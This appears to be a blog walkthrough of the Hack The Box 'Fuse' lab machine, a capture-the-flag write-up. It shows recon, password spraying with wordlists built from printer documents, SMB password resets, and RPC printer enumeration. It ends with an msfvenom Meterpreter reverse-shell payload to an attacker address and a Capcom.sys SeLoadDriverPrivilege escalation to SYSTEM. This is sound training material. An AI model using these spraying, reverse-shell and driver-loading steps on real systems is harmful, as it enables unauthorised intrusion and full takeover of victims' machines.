11. Hack The Box. Level Medium: Fuse Walkthrough. RPC, Printers, and the Dangerous SeLoadDriverPrivilege Privilege

12 December 2024 4 minutes Author: Lady Liberty

Learn how to successfully complete the Fuse challenge on the Hack The Box platform using RPC information gathering techniques, printer data analysis, and SeLoadDriverPrivilege privilege escalation exploitation.

Hack The Box: Fuse Task – RPC and the SeLoadDriverPrivilege Privilege

Solutions to tasks submitted for completion by machines from the HackTheBox platform are published.

The material describes the process of creating a password dictionary based on indirect information about users, analyzing printer data via RPC, and the method of privilege escalation using SeLoadDriverPrivilege.

Recon

The machine is assigned the IP address 10.10.10.193, which is added to the /etc/hosts file.

10.10.10.193 fuse.htb

First, we scan open ports.

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

Add the FQDN of the machine name to /etc/hosts.

10.10.10.193    fuse.fabricorp.local

A web server is running on the host. Let’s see what’s there.

We are greeted by a site with printers, on which four documents are available for download, which should be downloaded for further analysis.

Since no other attack vectors have been identified, it is worth recording the usernames for future reference.

cat *.csv | grep 2020 | cut -d ',' -f 2 | sort | uniq

We will also create a list of passwords from the information in the documents.

cat *.csv | grep 2020 | cut -d ',' -f2,5-7 | tr -d '"' | tr '.' '\n' | tr ',' '\n' | tr -d ' ' | tr '-' '\n' | sort | uniq | tail -n+4

Now it’s worth checking the ability to connect to SMB for further analysis.

cme smb 10.10.10.193 -u users.txt -p pass.txt --continue-on-success

There is a message that the password for the user needs to be changed.

Entry point

We will set the same password

smbpasswd -r 10.10.10.193 -U bhult

However, the password remains valid for only a few seconds.

Therefore, we execute two commands in a chain.

smbpasswd -r 10.10.10.193 -U bhult ; rpcclient -U bhult 10.10.10.193

We view all users, we will do this using RPC.

USER

And we find an interesting user. Considering all the topics with printers that have been going on all the time, let’s take a look at printers.

We find the password. We create a list of already valid users.

Now let’s try the password for all users.

sudo cme smb 10.10.10.193 -u users.txt -p '$fab@s3Rv1ce$1' --continue-on-success

Two users detected. Successfully connected to WinRM and received the first flag.

ROOT

Let’s look at the information about the current user.

The SeLoadDriverPrivilege privilege was discovered, which opens a vector for local privilege escalation (LPE). The following software is required to complete this process: Capcom.sys, EoPLoadDriver, and Meterpreter shell. The next step is to create these components.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.160 LPORT=4321 -f exe -o e.exe

Activate the listener. Upload everything to the host and run the meterpreter exploit.

handler -p windows/x64/meterpreter/reverse_tcp -H 10.10.15.160 -P 4321

Now you need to download the driver.

.\eoploaddriver.exe System\CurrentControlSet\custom C:\Users\svc-print\Documents\Capcom.sys

Before running the exploit, you need to make some changes to its code. You need to comment out certain lines in the file:

/usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb.

We do it:

Successful execution of the exploit resulted in the creation of a new session with SYSTEM privileges, demonstrating what can happen when the SeLoadDriverPrivilege privilege is used to locally elevate privileges.

Conclusion

This article describes the solution to the Fuse challenge on HackTheBox. It covers printer analysis, password dictionary creation, and the use of the SeLoadDriverPrivilege privilege to gain SYSTEM-level access. It shows how such vulnerabilities can be exploited to escalate privileges.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.